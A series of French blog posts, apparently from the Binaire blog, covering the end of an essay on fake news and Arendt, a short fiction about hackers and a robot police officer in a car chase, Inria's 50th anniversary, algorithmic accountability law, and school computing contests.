    Un second point qui mérite notre attention est soulevé par Jean-Claude Monod relisant Arendt à l’heure des Fake News : la vérité n’est pas la seule valeur dans la sphère politique d’une démocratie. L’utilisation massive du mensonge et de la rumeur dans le cadre de la présidentielle de 2016 ainsi que son traitement sous cet angle, conduit à nous faire oublier le poids des opinions. Comme le rappelle Arendt dans Vérité de fait et opinion politique qui est initialement publié dans le New Yorker le 25 février 1967, « on peut dire que l’opinion, plus que la vérité, constitue le véritable fondement de la démocratie[13] ». L’opinion c’est « savoir un peu et croire beaucoup » pourrait-on dire en forme de boutade.

    Deux questions valent la peine d’être posées une fois ce constat dressé : à quoi peuvent bien servir les fake news si elles ne sont pas toutes entières contenues dans le projet de tromper leurs destinataires et que nous disent-elles de notre modernité sur le plan informationnel ?

    La fausse nouvelle en ce qu’elle est virale comme l’ont souligné nombre d’analystes, ne circule que grâce aux truchements de la multitude, c’est-à-dire nous. Mais nous ne la relayons pas uniquement parce qu’elle est prise pour vraie, mais pour beaucoup d’autres raisons. Pour faire communauté avec celles et ceux qui partagent une indignation ou un engagement commun par exemple. Quand un site parodique déclare que des prostituées russes ont témoigné avoir eu des relations sexuelles avec le futur président américain et qu’il est affublé d’un micropénis[14], peut-être certains seront portés à le croire, mais à en croire les commentaires sur les réseaux sociaux ou les forums, cela sert avant tout au dénigrement caricatural de Donald Trump dans une version actualisée des poires de Daumier[15].

    Quand en 2015, la photographie de Justin Trudeau en visite dans une mosquée canadienne[16] est reprise sur plusieurs sites proches de l’extrême droite et qu’on y ajoute des interrogations sur sa « possible » conversion à l’islam, est-ce toujours une fake news puisqu’elle n’affirme rien ou plutôt une instrumentalisation politique par insinuation pour dénoncer la proximité de Trudeau avec les musulmans canadiens ?

    Quelques études commencent à montrer que la seule alternative entre le vrai et le faux n’est pas la bonne focale pour comprendre le phénomène des fake news. Quand ils essayent d’apprécier l’impact de ces dernières sur l’élection de Trump[17], Hunt Allcott et Matthew Gentzkow revoient considérablement à la baisse l’hypothèse d’une tromperie généralisée des électeurs au moyen des fausses nouvelles. John Bullock et ses coauteurs ont également montré qu’un panel représentatif d’électeurs choisissait délibérément d’ignorer les fausses nouvelles et de ne pas les faire circuler si l’on intéressait cet acte de sélection par une légère rémunération[18]

    Pour massif que le phénomène soit, son impact est donc à relativiser. Il ne s’agit pas non plus d’en faire un détail sans importance. Qu’on souhaite la combattre ou la comprendre, la fausse nouvelle comme la rumeur ouvrent des perspectives sur nos mentalités collectives en ce qu’elles « font appel aux émotions élémentaires et aux souhaits réprimés[19]. » En 1921, Marc Bloch qui avait servi sous les drapeaux et dans la boue des tranchées, ne disait pas autre chose en invitant l’historien à se pencher avec lui sur les rumeurs du front, « ces singulières efflorescences de l’imagination collective » qui en disent parfois plus sur les acteurs qu’ils n’en déclarent eux-mêmes, car « l’erreur ne se propage, ne s’amplifie, ne vit enfin qu’à une condition : trouver dans la société où elle se répand un bouillon de culture favorable. En elle, inconsciemment, les hommes expriment leurs préjugés, leurs haines, leurs craintes, toutes leurs émotions fortes[20]. »

    Pour finir, je pense que ces trop courts développements à propos d’un phénomène complexe invitent à deux attitudes complémentaires.

    En tant qu’historien, les fake news constituent un « terrain de jeu » sans pareil pour, dans les pas de Bloch, ouvrir la boîte noire des idéologies contemporaines en abandonnant la vision surplombante et stérile de la disqualification a priori du « faux ». Les collègues intéressés à la pratique d’une histoire immédiate appuyée sur les archives nouvelles que sont les archives du Web ont un champ nouveau et passionnant à investir.

    En tant que citoyen enfin et dans le sillage d’Arendt cette fois, il s’agit de garder à l’esprit que si la démocratie ne peut se passer de « vérité factuelle », la tentation d’opposer une vérité parfaite au mensonge est tout bonnement illusoire et contre-productif. La démocratie n’est pas affaire de spécialistes du vrai transformés en censeurs des opinions dissidentes et la mobilisation politique passe par bien d’autres voies que l’adhésion au vrai et le simple rejet du faux.

    Benjamin Thierry, Université Paris-Sorbonne, @BGThierry ‏

    [1]. KEYES Ralph, The Post-Truth Era. Dishonesty and Deception in Contemporary Life, St. Martin’s Press, New York, 2004, 312 p.

    [2]. « Rendre public ». Entretien avec Fabrice Arfi, in Médium, n°52-53, 2017, p. 59-84.

    [3]. REBILLARD Franck, La rumeur du durant la présidentielle de 2016 aux États-Unis. Les appuis documentaires du numérique et de l’Internet à l’agitation politique, in Réseaux, n°202-203, 2017, p. 273-310.

    [4]. Pouvoirs de l’algorithmie. Entretien avec Bruno Patino, in Médium, n°52-53, 2017, p. 174.

    [5]. STEINKOLER Manya, Mar a logos. L’élection de Trump et les fake news, in Savoirs et clinique, n°23, 2017, p. 30.

    [6]. Pouvoirs de l’algorithmie. Entretien avec Bruno Patino, in Médium, n°52-53, 2017, p. 178.

    [7]. Ibid.

    [8]. Ibid.

    [9]. Brian Denis, Pulitzer: A Life, Wiley, New York, 2001, 464 p.

    [10]. Taguieff Pierre-André, Les Protocoles des Sages de Sion. Faux et usages d’un faux, Fayard, Paris, 2004, 489 p.

    [11]. ZAKHAROVA Larissa, Accéder aux outils de communication en Union soviétique sous Staline, in Annales. Histoire, sciences sociales, 2, 2013, p. 463-497.

    [12]. EUSTACHE Sophie & TROCHET Jessica, De l’information au piège à clics. Ce qui se cache derrière Melty, Konbini, Buzzfeed…, in Le Monde diplomatique, n°115, 2017, p. 21.

    [13]. MONOD Jean-Claude, Vérité de fait et opinion politique, in Esprit, octobre 2017, p. 143-153.

    [14]. Voire par exemple https://www.snopes.com/trump-russian-poorly-endowed/, consulté le 20/11/2017.

    [15]. Qui entretient une relation certaine avec le travail d’Illma Gore, voire ici : http://www.huffingtonpost.fr/2016/04/18/donald-trump-nu-micropenis-artiste-risque-proces_n_9719306.html.

    [16]. https://www.islametinfo.fr/2015/10/22/photos-canada-le-nouveau-premier-ministre-serait-il-converti-a-lislam/, consulté le 06/11/2017.

    [17]. ALLCOTT Hunt & GENTZKOW Matthew, Social Media and Fake News in the 2016 Election, in Journal of economic perspectives, voL. 31, n°2, 2017, p. 211-236.

    [18]. BULLOCK John G., GERBER, ALAN S., HILL Seth J. & HUBER Gregory A. et al., Partisan bias in factual beliefs about politics, in Quarterly Journal of Political Science, vol. 10, 2015, p. 519-578.

    [19]. STEINKOLER Manya, Mar a logos. L’élection de Trump et les fake news, in Savoirs et clinique, n°23, 2017, p. 28.

    [20]. Bloch Marc, Réflexions d’un historien sur les fausses nouvelles de la guerre, Allia, Paris, 1999, p. p. 23.

    Pour aller plus loin

    « Rendre public ». Entretien avec Fabrice Arfi, in Médium, n°52-53, 2017, p. 59-84.

    ALLCOTT Hunt & GENTZKOW Matthew, Social Media and Fake News in the 2016 Election, in Journal of economic perspectives, voL. 31, n°2, 2017, p. 211-236.

    BELIN Célia, Comment anticiper la politique étrangère de Donald Trump ?, in Esprit, n°1, 2017, p. 131-139.

    BERTHO-LAVENIR Catherine, Déjà-vu, in Médium, n°52-53, 2017, p. 85-100.

    BLOCH Marc, Réflexions d’un historien sur les fausses nouvelles de la guerre, Allia, Paris, 1999, 64 p.

    BRIAN Denis, Pulitzer: A Life, Wiley, New York, 2001, 464 p.

    BULLOCK John G., GERBER, ALAN S., HILL Seth J. & HUBER Gregory A. et al., Partisan bias in factual beliefs about politics, in Quarterly Journal of Political Science, vol. 10, 2015, p. 519-578.

    COLIN Nicolas & VERDIER Henri, L’âge de la multitude. Entreprendre et gouverner après la révolution numérique, Armand Colin, Paris, 2015, 304 p.

    EUSTACHE Sophie & TROCHET Jessica, De l’information au piège à clics. Ce qui se cache derrière Melty, Konbini, Buzzfeed…, in Le Monde diplomatique, n°115, 2017, p. 21.

    MONOD Jean-Claude, Vérité de fait et opinion politique, in Esprit, octobre 2017, p. 143-153.

    Pouvoirs de l’algorithmie. Entretien avec Bruno Patino, in Médium, n°52-53, 2017, p. 173-185.

    REBILLARD Franck, La rumeur du durant la présidentielle de 2016 aux États-Unis. Les appuis documentaires du numérique et de l’Internet à l’agitation politique, in Réseaux, n°202-203, 2017, p. 273-310.

    STEINKOLER Manya, Mar a logos. L’élection de Trump et les fake news, in Savoirs et clinique, n°23, 2017, p. 23-33.

    TAGUIEFF Pierre-André, Les Protocoles des Sages de Sion. Faux et usages d’un faux, Fayard, Paris, 2004, 489 p.

    ZAKHAROVA Larissa, Accéder aux outils de communication en Union soviétique sous Staline, in Annales. Histoire, sciences sociales, 2, 2013, p. 463-497.

  • You are under arrest

    Les objets connectés envahissent notre monde, téléphones, montres, voitures et autres moyens de transports, domotique, etc. Ils ont pour but d’améliorer nos vies. Toutes les données qu’ils captent dévoilent nos vies privées si elles ne sont pas protégées. Notre sécurité est aussi en question. Une nouvelle de Serge Abiteboul qui essaie d’imaginer ce qui pourrait se produire dans le futur si, aujourd’hui, nous n’accordons pas au sujet de la sécurité, toute l’importance qu’il mérite. Thierry Viéville

    You are under arrest, ©© Bétise à bloguer

    La Mustang fonce silencieusement dans le petit matin, à quelques mètres au dessus de la chaussée. Les truands savent depuis longtemps trafiquer le contrôleur de vitesse. La Peugeot de la police les course dans le 20ème arrondis­se­ment encore quasi désert.

    Clyde interroge Bonnie :

    • Le braquage du chinois devait être finger in the nose. Il fallait vraiment que t’aies besoin de passer aux gogues?
    • Ça se commande pas.
    • Et que tu vois pas le détecteur d’intrusion ? Mon amour de pied nickelé.
    • Qui met un détecteur d’intrusion aux chiottes. Pourquoi pas des caméras ?

    Ça paraissait un plan tranquille. Évidemment, il ne s’agissait pas de cambrioler un coffre-fort : depuis longtemps, il n’y a plus de cash ou même de bijoux dans les coffres qui sont devenus numériques. Bonnie et Clyde voulaient juste s’introduire dans le réseau d’un galeriste pour y réaliser quelques transactions juteuses.

    Silence dans la voiture. Clyde trouve que cette poursuite s’éternise :

    • Tu nous débarrasses des morpions ?
    • Donne-moi une minute. Leur voiture est équipée du dernier système android. C’est une passoire de sécurité, explique-t-elle.
    • Tu as eu le temps d’imprimer ceux qui nous coursent ?
    • Oui. Un robot dans le siège du conducteur et une keuflette qui pianote sur un laptop dans celui de la morte.

    Ça faire rire Clyde :

    • Si on en arrive à la baston, tu prends la meuffe et moi le robot. J’ai toujours rêvé de péter la gueule d’un robocop.

    Rue Oberkampf à fond la caisse. Virage dans un crissement de pneus de la Mustang, rue de Belleville. C’est au tour de Bonnie de rire :

    • Trop vrais les crissements de pneu. On se croirait dans un vieux Fast and Furious.
    • Je les ai trouvés dans un truc encore plus vieux. Bullit, précise Clyde.
    • Vintage !

    Dans la voiture de police, la « keuflette » essaie l’injonction d’arrêt de la Mustang ; sans succès : les deux truands ont bloqué tous les systèmes officiels qui permettent à la police de prendre le contrôle de voitures pour éviter un accident, empêcher de perpétrer un attentat terroriste, ou juste parce que la tronche du conducteur ne leur revient pas.  Comme rien ne marche, elle se plonge sur le site d’Europol. Elle résume les pedigrees des deux braqueurs :

    • Bonnie Nguyen, 29 ans, parisienne, ingénieure en informatique, condamnée plusieurs fois pour violation de la loi Anti Piratage Numérique.
    • Clyde Martin-Adjani, son compagnon, 27 ans, pur produit de la partie sombre du 9-3, un peu dealer et beaucoup black hat. Un casier judiciaire long comme un jour de tafe, qui culmine avec deux ans de prison pour usurpation d’identité sur le net. Ce con se faisait passer pour le fils du roi du Maroc.

    Les deux voitures roulent l’une derrière l’autre. Les policiers se rapprochent et n’ont plus qu’une centaine de mètres de retard sur les truands… quand le moteur de la Peugeot s’éteint. Ils continuent sur l’élan mais la Mustang s’éloigne.

    La policière questionne :

    • Qu’est-ce que tu nous fais Starsky ?
    • Rien ! Les suspects ont pris le contrôle de la batterie. Elle indiquait 95% il y a quelques secondes. Maintenant 0%. Je ne comprends pas. Qu’est-ce qu’on fait ?
    • Celui qu’a fait ça est pas la moitié d’un mulot, reconnaît la policière. Putain. Je vais te bloquer ces connards.

    Il s’appelle Starsky et elle, Hutch. Starsky et Hutch étaient deux policiers d’une série culte du siècle dernier. Deux hommes, pas un robot et une femme. Les temps changent.

    Dans la Mustang, Bonnie commente sobrement :

    • Dans le cul, les keufles.

    Leurs rires s’éteignent quand leur voiture freine brutalement et s’immobilise.

    • Que passa ? interroge Clyde.
    • Jamais vu, répond Bonnie. La Mustang reçoit chaque seconde une mise-à-jour de Waze qui lui indique que la route devant est fermée, puis rouverte, puis fermée… Ça gèle le sélecteur de trajet. La keuflette est une sacrée hackeuse.`
    • On peut faire quelque chose ?
    • Courir ?

    Bonnie et Clyde abandonnent la Mustang et partent en courant dans les petites rues de Ménilmontant, Hutch et son robot Starsky à leurs trousses. Finalement, flics et voyous se retrouvent dans un ballet vieux comme le monde.

    Bonnie et Clyde ne sont pas sportifs alors que Hutch est championne régionale de badminton, et que Starsky peut rouler à près de vingt kilomètres heure pendant des heures, tant qu’il n’a pas vidé sa batterie. Les escaliers le ralentissent bien un peu mais il est équipé du nouveau système Jumpy-quadruped de l’armée chinoise qui lui permet de grimper des marches, peut-être sans élégance, mais à une vitesse raisonnable.

    C’était prévisible, les deux truands se font rattraper. Ils n’avaient pas la moindre chance de s’en tirer, surtout avec un drone de la police maintenant au-dessus d’eux, collé à leurs basques.

    Bonnie se rend sans résister à Hutch. Clyde tente une manœuvre :

    • On ne va pas se laisser arrêter comme cela.
      Téléportation bleue !

    La téléportation, une technique révolutionnaire pour transférer son corps dans l’espace en le numérisant et en utilisant des communications quantiques. Vous y croyez, vous ?

    Starsky commente sobrement :

    • Monsieur, il ne faut pas croire tout ce qu’on trouve sur Internet.

    Bonnie, qui n’aime pas qu’on se moque de son mec, se venge à sa façon :

    • Tu feras moins la maline, petite quincaille, dans quelques jours quand tu seras terminée. Tu ne sais peut-être pas qu’Hutch a commandé un modèle tout neuf.
    • Je ne savais pas, reconnait Starsky à voix douce. Mais c’est la life des robots.

    Comme Clyde ne se laisse pas menotter, le robot lui balance un coup de taser de plusieurs dizaines de milliers de volts, en contradiction avec la convention de Romorantin qui interdit aux robots les actes de violence sur les humains. Puis, satisfait de la victoire des bons sur les méchants, Starsky chantonne une vieille chanson de Gainsbourg : You’re under arrest, Cause you are the best…

    On rencontre même des robots heureux.

    Serge Abiteboul, Inria et ENS, Paris

  • Inria : 50 ans et l’ambition du numérique pour la France

    Dans le paysage numérique français au cœur de l’intérêt de Binaire, Inria, l’institut français en science du numérique, tient une place singulière, voire essentielle. A l’occasion des 50 ans d’Inria, nous avons demandé à son président, Antoine Petit, de nous parler du passé de l’institut et surtout de nous dire comment il voit le futur de la recherche dans ce domaine en France. Binaire profite de cette occasion pour souhaiter à Inria : Bon anniversaire et tous nos vœux de succès pour les années à venir ! Serge Abiteboul

    Antoine Petit, PDG d’Inria © Inria / Photo G. Scagnelli

    Le Plan Calcul voulu par le Général de Gaulle a conduit à la création en 1967 de l’IRIA et de la CII devenue par la suite CII Honeywell Bull puis Bull. L’idée originelle était de doter la France des capacités, tant sur le plan recherche que sur le plan industriel, de concurrencer les américains qui venaient de refuser de nous vendre le plus gros ordinateur de l’époque (d’une puissance bien moindre que les smartphones que la plupart d’entre nous ont dans leur poche). Ce n’est qu’en 1979 que l’IRIA devient national et se transforme en INRIA – Institut National de Recherche en Informatique et en Automatique. C’est la même année qu’est créé le deuxième centre Inria, à Rennes. Puis les centres de Sophia-Antipolis (1983), Grenoble (1986), Nancy (1992), Bordeaux, Lille et Saclay (tous les trois en 2008) voient successivement le jour. Et en 2011, INRIA décide de ne plus être un acronyme mais un nom, Inria, celui de l’institut français en charge des sciences du numérique.

    Voilà donc 50 ans qu’Inria met son excellence scientifique au service du transfert technologique et de la société. Inria est aujourd’hui un des instituts les plus performants à travers le monde dans ses domaines de compétences, attractif et très international, près de 100 nationalités sont présentes dans nos équipes-projets. Il faut souligner qu’une grande partie des succès d’Inria ont été construits dans le cadre de partenariats avec des universités ou grandes écoles, ou d’autres organismes de recherche, le CNRS bien sûr et aussi le CEA, l’Inra ou l’Inserm pour ne citer que les principaux.

    En 50 ans le monde est devenu numérique, belle formule souvent attribuée à Gérard Berry. Inria a accompagné cette transformation et la montée en puissance, et la reconnaissance de la science informatique qui s’en sont suivies dans notre pays.

    L’évolution a été très forte en un demi-siècle. En schématisant et en simplifiant, hier, informaticiens et mathématiciens travaillaient un peu de leur côté, pour eux mêmes. Aujourd’hui, ils collaborent de plus en plus avec les autres sciences, que ce soient les sciences de la vie, les sciences de l’environnement, les sciences humaines et sociales, etc. Une autre évolution très perceptible concerne la transformation numérique des activités socio-économiques et la présence de plus en plus importante du numérique dans la vie de tous les jours.

    Pour autant, nous sommes convaincus que cette transformation numérique du monde n’en est qu’à ses débuts, presque à ses balbutiements. Si le futur de notre société sera numérique, ce futur n’est pour autant pas écrit. Dans 50 ans, le monde dans lequel nous vivrons sera celui que nous aurons choisi de construire en fonction de nos valeurs, de nos cultures et de nos choix de sociétés. Nous devrons savoir prendre en compte des questions scientifiques et technologiques bien sûr mais aussi  des questions de formation, d’éthique et même de choix de société

    Nous devons aussi décider quelle place nous voulons que la France occupe dans ce futur numérique. La France a tous les atouts pour y jouer un rôle de premier plan, pour autant qu’elle en fasse une réelle priorité. Nous devons investir aujourd’hui pour que demain des emplois et de la valeur soient créés dans notre pays. Mais, il ne faut pas se voiler la face, la compétition est internationale et féroce.

    Si la France décide de participer à cette compétition, elle doit faire les choix nécessaires pour y figurer dignement.

    N’en déplaise à quelques esprits rétrogrades qui ne comprennent pas le monde nouveau qui est le nôtre,  il est totalement anormal et contreproductif qu’une lycéenne ou un lycéen puisse entrer à l’Université sans savoir coder et s’être construit une pensée algorithmique, et ce quel que soit le métier auquel elle ou il se destine.

    Il faut également revoir l’éducation et la formation tout au long de la vie, et donner à chacune et chacun les clés de compréhension du monde numérique dans lequel nous vivons. La faible culture, voire même parfois l’inculture, de la société en général, des décideurs en particulier – même s’il y a bien sûr des exceptions – est un handicap pour notre pays.

    Inria essaye à son niveau de faire bouger les choses en prenant une part active à des opérations aussi diverses  que le portage de l’opération Class Code, programme de formation de formateurs en informatique ou encore la conception, en liaison étroite avec le Conseil National du Numérique de la plateforme TransAlgo qui vise à étudier la transparence et la loyauté des algorithmes, tout en faisant réfléchir à ces notions. Mais toutes ces initiatives ne passent pas à l’échelle et font courir le risque d’éloigner Inria de son cœur de métier. C’est à d’autres de prendre le relais et de permettre au plus grand nombre de bénéficier de sensibilisations ou de formations comparables.

    Il faut aussi que notre pays sache investir massivement s’il veut jouer un rôle de premier plan, s’il veut tirer parti des investissements déjà réalisés et s’il veut que les citoyens, bien formés, trouvent des emplois adaptés à leurs compétences dans ce nouvel ordre économique.

    Nous attendons avec impatience le rapport de Cédric Villani sur l’intelligence artificielle. Mais il sera essentiel que ce rapport ne reste pas lettre morte, cela arrive parfois dans notre pays. Il appartiendra au Gouvernement d’en tirer un plan d’actions et d’y consacrer une enveloppe budgétaire d’un niveau donnant l’ambition à la France d’être un acteur de premier plan au niveau international. Bien sûr, nous savons tous que la France a des marges de manœuvre financière limitées.  C’est justement pour cela qu’il faut faire des vrais choix, définir des priorités et donc savoir aussi renoncer.

    L’enjeu est de taille, c’est tout simplement la France, celle que nous voulons construire pour nos enfants et petits-enfants, une France attractive où il y aura des emplois, du bien-être et des richesses pour le plus grand nombre, idéalement pour toutes et tous, une France qui aura à cœur que les progrès liés au numérique bénéficient au plus grand nombre et ne soient pas accaparés par quelques-uns, individus, grandes firmes internationales ou nations, pour leur seul profit.

    Antoine Petit, Président d’Inria

  • Algorithmes : au-delà de la transparence, la redevabilité

    Les algorithmes envahissent nos vies, et en cela ils se doivent de respecter les lois, et les valeurs éthiques de notre société. Pour coexister avec eux, il est important de comprendre ce qu’ils font. C’est en cela que leur transparence prend toute son importance. Pour traiter ce sujet pour Binaire, nous avons un tandem ; un informaticien et une juriste. Il faut bien cela pour un sujet qui, s’il parle d’informatique, implique les sciences humaines de manière essentielle. Serge Abiteboul.

                  

    Les algorithmes d’aide à la décision sont désormais omniprésents. Ils influencent notre vie quotidienne, par les informations qui nous sont transmises ou par les suggestions qui nous sont adressées en ligne. Ils facilitent nos actions individuelles au jour le jour, mais sont aussi susceptibles d’apporter de grands bénéfices collectifs, dans des domaines aussi variés que la médecine, la justice ou la sécurité par exemple. Toutefois, leur développement suscite également des craintes importantes. Elles concernent notamment les risques de discriminations, de traitements déloyaux, voire de manipulations. Ces éventuels mésusages méritent d’être débattus, et le sont dans des cadres variés depuis l’adoption de la Loi pour une République numérique : cycle de débats sur l’éthique et le numérique lancé par la CNIL en janvier 2017, consultation sur les plateformes initiée par CNNum en octobre 2017, ou encore projet TransAlgo piloté par Inria. La France n’est évidemment pas seule à se mobiliser sur ces questions et on ne compte plus les rapports, recommandations et livres blancs sur l’éthique du numérique ou de l’intelligence artificielle (IA) publiés en Europe et aux Etats-Unis.

    Soyons redevable

    La première source d’inquiétude concernant les algorithmes étant leur opacité, la transparence est généralement mise en avant comme le premier remède. Cependant le terme de « transparence » n’est pas lui-même dénué d’ambiguïté. Par exemple, la seule publication du texte d’un algorithme ou du code source d’un logiciel n’est pas la panacée car ceux-ci peuvent demeurer tout à fait opaques pour le commun des citoyens (et même parfois pour des experts). Par ailleurs, le fonctionnement de certains types d’algorithmes, qui reposent sur l’apprentissage automatique, ne peut être appréhendé indépendamment des jeux de données utilisés pour l’apprentissage. En effet, ces données peuvent intégrer des biais qui seront « appris » puis reproduits par l’algorithme. Plus que la transparence, c’est la « redevabilité » entendue comme « devoir de rendre compte », qui nous paraît le véritable enjeu. Ce devoir inclut deux composantes : le respect de règles, notamment juridiques ou éthiques, d’une part ; la nécessité de rendre intelligible la logique sous-jacente au traitement, d’autre part. Il se décline de différentes manières selon les publics visés. Pour le citoyen sans compétence technique particulière, il peut s’agir de comprendre les critères déterminants qui ont conduit à un résultat qui le concerne (classement d’information, recommandation, envoi de publicité ciblée, etc.) ou la justification d’une décision particulière (affectation dans une université, refus de prêt, etc.). Un expert pourra être intéressé par des mesures plus globales, comme des explications sous forme d’arbres de décision ou d’autres représentations graphiques mettant en lumière les données prises en compte par l’algorithme et leur influence sur les résultats. Un organisme de certification peut se voir confier une mission de vérification qu’un algorithme satisfait certains critères de qualité (non-discrimination, correction, etc.), sans pour autant que celui-ci ne soit rendu public.

    Cette exigence de « redevabilité » représente un défi majeur pour les juristes comme pour les informaticiens. D’une part, certains algorithmes reposent sur des techniques, comme l’apprentissage profond qui sont intrinsèquement difficiles à appréhender pour des humains. D’autre part, qu’ils reposent sur l’IA ou pas, les quantités importantes de facteurs (données d’entrée) pris en compte et les multiples manières de les combiner sont parfois des obstacles à l’intelligibilité. Enfin, certains algorithmes sont fréquemment modifiés, ce qui ajoute encore un niveau de difficulté.

    La question de l’explication n’est pas un sujet de recherche complètement nouveau en informatique. Elle a été étudiée en particulier dans les domaines du logiciel et de l’IA, et elle suscite depuis quelques années un regain d’intérêt. De nombreux défis restent à relever cependant. En particulier, comment marier la précision d’une explication et son intelligibilité, garantir sa fiabilité, mesurer son intelligibilité envers différents publics (qu’est-ce qu’une bonne explication ?). En sus des travaux visant à reconstituer a posteriori une forme d’intelligibilité aux traitements algorithmiques, l’idéal serait de prendre en compte cette exigence dès la phase de conception, et de concevoir ainsi « par construction » des algorithmes produisant, en plus de leurs résultats nominaux, les justifications associées.

    Même si les solutions en la matière reposent forcément sur les techniques disponibles, la technologie ne peut prétendre répondre seule aux questions posées par l’usage des algorithmes d’aide à la décision. Avec l’adoption de la Loi pour une République numérique, la France a introduit de nouvelles obligations pour les administrations et les plateformes numériques.

    Le décret d’application du 16 mars 2017 dispose notamment que « l’administration communique à la personne faisant l’objet d’une décision individuelle prise sur le fondement d’un traitement algorithmique, à la demande de celle-ci, sous une forme intelligible et sous réserve de ne pas porter atteinte à des secrets protégés par la loi, les informations suivantes :

    – Le degré et le mode de contribution du traitement algorithmique à la prise de décision
    – Les données traitées et leurs sources ;
    – Les paramètres de traitement et, le cas échéant, leur pondération, appliqués à la situation de l’intéressé ;
    – Les opérations effectuées par le traitement. »

    Ces exigences réglementaires sont assez précises, et peuvent être difficiles à mettre en œuvre pour certains algorithmes, mais elles ont un champ délimité, puisqu’elles ne concernent que les décisions des administrations. D’autres visent les opérateurs de plateforme en ligne, mais leur objet est « de délivrer au consommateur une information loyale, claire et transparente sur :

    Les conditions générales d’utilisation du service d’intermédiation qu’il propose et sur les modalités de référencement, de classement et de déréférencement des contenus, des biens ou des services auxquels ce service permet d’accéder ;

    L’existence d’une relation contractuelle, d’un lien capitalistique ou d’une rémunération à son profit, dès lors qu’ils influencent le classement ou le référencement des contenus, des biens ou des services proposés ou mis en ligne.

    Au-delà de ces activités précises, il faut se tourner vers le droit des données personnelles.

    La loi Informatique et Liberté et le nouveau règlement européen sur les données personnelles encadrent précisément les « décisions individuelles automatisées » (art. 22), avec notamment le « droit de la personne concernée d’obtenir une intervention humaine de la part du responsable du traitement, d’exprimer son point de vue et de contester la décision ». Cependant ces dispositions sont sujettes à interprétation et comportent des restrictions majeures. En particulier, elles ne concernent que les décisions fondées exclusivement sur un traitement automatisé et produisant des effets juridiques ou affectant de manière significative le sujet. De ce fait, il reste encore du travail à faire pour garantir que les outils d’aide à la décision répondent à l’exigence de redevabilité, vis-à-vis de leurs utilisateurs-décideurs comme des personnes destinataires de la décision.

    Au-delà de leur grande variété, les algorithmes partagent un point commun : leur fonctionnement repose sur l’exploitation de données, souvent à grande échelle, et ces données sont souvent des données personnelles. Dès lors, l’exigence de redevabilité s’applique également à la collecte des données et cette phase pose aussi de nouveaux défis à une époque où des données de plus en plus nombreuses sont collectées de multiples façons et dans des contextes variés. C’est le cas en particulier de ce qu’on appelle les métadonnées (ou « données sur les données ») qui sont transmises implicitement avec les données principales, par exemple lors d’une communication. Ces métadonnées (en particulier les données de connexion ou de géolocalisation) sont parfois plus intrusives que les données auxquelles elles se rapportent. Le droit français et européen a ainsi été amené à étendre le champ de la protection des données personnelles, par exemple pour intégrer les adresses IP. Par ailleurs, la divulgation de données même anodines en apparence devient problématique.  En effet, ces données peuvent souvent être recoupées pour inférer des informations précises ou constituer des profils. La CNIL en est très consciente et alerte depuis plusieurs années sur les risques induits en la matière. En informatique, de nombreux travaux ont également été réalisés ces dernières années pour améliorer les connaissances sur les collectes de données personnelles. A titre d’exemple, le projet Mobilitics, fruit d’une collaboration entre l’équipe-projet Inria Privatics et la CNIL, a permis de mettre au jour certaines pratiques opaques, déloyales, et même parfois illégales en matière de collecte de données personnelles sur les téléphones mobiles.

    Pour conclure, au-delà des enjeux techniques et juridiques, il est clair que la généralisation de l’usage des algorithmes pose d’abord des questions d’éthique et de choix de société. Ces choix doivent être mis au débat, comme on l’a entrepris récemment en France et dans de nombreux autres pays. Pour dépasser les positionnements idéologiques, ces débats doivent être autant que possible alimentés par la connaissance scientifique et informés par une meilleure diffusion de la culture informatique. Pour ce qui concerne la technique elle-même, il faut admettre que de grand progrès sont encore à réaliser pour rendre possible la « redevabilité des algorithmes ». Ce courant de recherche devrait connaître un fort développement au cours des années à venir. On peut espérer que cet effort sera conduit de manière interdisciplinaire car il doit mobiliser des compétences variées aussi bien dans le domaine informatique au sens large (intelligence artificielle, logiciels, interaction homme-machine, etc.), qu’en sciences humaines (juridiques, éthiques, sociales, politiques, etc.).

    Daniel Le Métayer, Inria, Université de Lyon, et Sonia Desmoulin-Canselier, CNRS, Université de Nantes.

  • Maman ! Papa ! J’veux devenir informaticien.ne !!

    C’est une bonne idée mon enfant, tu maîtriseras le numérique, tu verras si les métiers en lien avec l’informatique peuvent te plaîre et écoute ça ; tu peux le faire dès maintenant.

    La découverte : le Concours Castor.

     Découvrir ce qu’est l’informatique et ne pas uniquement l’utiliser ?

    Le concours Castor Informatique se déroule en ce moment et jusqu’au 8 décembre. Plus de 500 000 élèves du CM1 à la terminale y participent.

    Les défis du concours Castor permettent de découvrir des éléments introductifs aux bases du codage de l’information, de l’algorithmique, des graphes, des bases de données, de la programmation, de la logique …

    Il n’est pas trop tard pour participer ! Parlez-en aux enseignants, ceux sont eux qui inscrivent les classes, en créant un compte sur la plateforme de coordination.

    Témoignages :

    «Merci pour ce concours, 3 ans que je le fais passer aux élèves. La plupart prennent beaucoup de plaisir et certains se découvrent même des capacités et prennent de la confiance en eux pour le reste de l’année. — Antoine, enseignant au collège dans l’académie de Nantes.

    Permettez-moi avant tout de vous remercier pour tout le travail que vous faites, c’est stimulant pour nos élèves et ça leur donne goût aux mathématiques et à la programmation. — Éric, enseignant dans l’académie de Paris. »

    Le concours Castor : comment ça marche ?

    Lors du concours Castor, les participant.e.s ont 45 minutes pour résoudre, seul.e.s ou en binômes, 12 défis interactifs en ligne. Chaque défi est décliné en trois versions, de difficulté progressive. La navigation dans les défis s’adapte automatiquement selon la réussite et le temps passé.

    Pour visualiser à quoi ressemble un défi, vous pouvez rejouer les défis de l’année dernière !

    Notez que le concours est entièrement gratuit et ouvert à toutes les filières (générales, technologiques, professionnelles, SEGPA, ULIS, …).

    Après le Castor : découvrir la programmation avec Algoréa !

     Découvrir si l’informatique ça me plaît  ?

    Algoréa propose des défis pour s’initier à la programmation de manière ludique et à son rythme. Il s’agit, par exemple, de programmer les actions d’un robot qui doit ramasser des objets ou peindre des cases.

    Le retour visuel interactif permet aux élèves de facilement comprendre leurs erreurs. Il motive les élèves et leur permet une progression rapide. Comme pour le Castor, la difficulté est progressive, permettant de bien maîtriser les concepts fondamentaux. Les défis Algoréa peuvent être programmés avec des langages visuels (Blockly ou Scratch). Le langage Python, enseigné au lycée, peut également être utilisé. Les notions abordées correspondent aux contenus des programmes d’enseignement.

    Afin de proposer des défis adaptés au niveau de chacun.e, Algoréa est organisé* en 3 tours. À chaque tour, il est possible de participer dans l’un des 5 niveaux, et de passer ainsi au niveau suivant.

